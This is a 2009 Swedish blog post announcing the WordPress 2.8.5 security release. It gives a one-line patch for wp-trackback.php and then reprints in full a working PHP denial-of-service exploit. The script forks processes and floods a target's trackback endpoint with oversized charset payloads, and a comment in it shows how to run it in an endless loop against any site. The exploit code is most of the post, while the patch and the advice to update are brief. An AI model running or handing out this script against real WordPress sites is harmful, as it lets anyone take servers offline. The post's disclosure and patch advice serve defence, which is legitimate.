Tobias

Wordpress 2.8.5 släppt

av Tobias skrivet den Oct.21, 2009, under Allmänt

wordpress pumpaDet verkar som att Wordpress har släppt en ny version som är tänkt att höja säkerheten på Wordpress. Uppdateringen inkluderar en fix för en DoS-attack som florerat runt på nätet en tid. Efter en snabb googling hittade jag exploiten som är väldigt enkel att använda för någon som har (eller vet hur man skaffar) PHP CLI.

Är du mån om din blogg och din server så borde du ladda ned och uppdatera snarast.

edit: Det verkar som att Wordpress Mu inte har uppdaterats när jag skriver detta.
Vill du uppdatera och manuellt lägga in fixen kan du byta ut rad nummer 53 i filen wp-trackback.php till

  1.  
  2. $charset = str_replace( array(',', ' '), '', strtoupper( trim($charset) ) );

Här nedan har ni exploiten:

  1. <?php
  2. /*
  3. * wordpress Resource exhaustion Exploit
  4. * http://rooibo.wordpress.com/
  5. * security@wordpress.org contacted and get a response,
  6. * but no solution available.
  7. *
  8. * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <panic@zerial.org>
  9. *
  10. * exploiting:
  11. * you must install php-cli (command line interface)
  12. * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
  13. *
  14. */
  15. if(count($argv) < 2)
  16. die("You need to specify a url to attack\n");
  17. $url = $argv[1];
  18. $data = parse_url($url);
  19. if(count($data) < 2)
  20. die("The url should have http:// in front of it, and should be complete.\n");
  21. $path = (count($data)==2)?"":$data['path'];
  22. $path = trim($path,'/').'/wp-trackback.php';
  23. if($path{0} != '/')
  24. $path = '/'.$path;
  25. $b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
  26. $charset = "";
  27. $charset = str_pad($charset,140000,"UTF-8,");
  28. $str = 'charset='.urlencode($charset);
  29. $str .= '&url=www.example.com';
  30. $str .= '&title='.$b;
  31. $str .= '&blog_name=lol';
  32. $str .= '&excerpt=lol';
  33. for($n = 0; $n <= 5; $n++){
  34. $fp = @fsockopen($data['host'],80);
  35. if(!$fp)
  36. die("unable to connect to: ".$data['host']."\n");
  37. $pid[$n] = pcntl_fork();
  38. if(!$pid[$n]){
  39. fputs($fp, "POST $path HTTP/1.1\r\n");
  40. fputs($fp, "Host: ".$data['host']."\r\n");
  41. fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
  42. fputs($fp, "Content-length: ".strlen($str)."\r\n");
  43. fputs($fp, "Connection: close\r\n\r\n");
  44. fputs($fp, $str."\r\n\r\n");
  45. echo "hit!\n";
  46. }
  47. }
  48. ?>
:

Skriv en kommentar!